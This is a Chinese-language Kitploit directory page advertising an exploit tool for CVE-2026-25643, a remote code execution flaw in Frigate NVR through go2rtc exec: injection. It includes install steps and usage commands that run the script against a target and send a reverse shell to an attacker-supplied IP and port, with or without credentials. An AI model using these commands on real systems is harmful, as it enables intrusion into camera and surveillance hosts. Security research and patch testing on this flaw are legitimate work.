Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-25643-Frigate-RCE — 针对 Frigate NVR 通过 go2rtc exec 协议注入实现认证远程代码执行(RCE)的利用工具,可自动化系统命令执行与反弹 shell 捕获。 | Kitploit
工具/GitHubGitHub/jduardo2704/cve-2026-25643-frigate-rce
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育远程访问工具
GitHubjduardo2704/cve-2026-25643-frigate-rce

CVE-2026-25643-Frigate-RCE

针对 Frigate NVR 通过 go2rtc exec 协议注入实现认证远程代码执行(RCE)的利用工具,可自动化系统命令执行与反弹 shell 捕获。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
337个月前尚未审核
分享

CVE-2026-25643:Frigate NVR <= 0.16.3 已认证远程代码执行

漏洞标题: Frigate NVR <= 0.16.3 - 已认证远程代码执行
日期: 2026-02-05
漏洞作者: jduardo2704
厂商主页: https://frigate.video/
软件链接: https://github.com/blakeblackshear/frigate
版本: <= 0.16.3
CVE: CVE-2026-25643 安全公告: https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x

描述

Frigate 版本 0.16.3 及以下存在通过 go2rtc 配置导致的远程代码执行(RCE)漏洞。拥有认证访问权限的攻击者(若实例暴露,则未认证亦可)可利用 exec: 协议将系统命令注入流配置。此漏洞利用工具可自动完成载荷注入、重启服务并捕获反向 Shell。

安装

root@kitploit:~
pip install requests pyyaml

使用方法

认证模式:

root@kitploit:~
python3 frigate_rce.py -u http://target:5000 -U admin -P password -lh YOUR_IP -lp 4444

未认证模式(若实例暴露):

root@kitploit:~
python3 frigate_rce.py -u http://target:5000 -lh YOUR_IP -lp 4444

免责声明

此脚本仅用于教育目的及授权的安全测试。

下载工具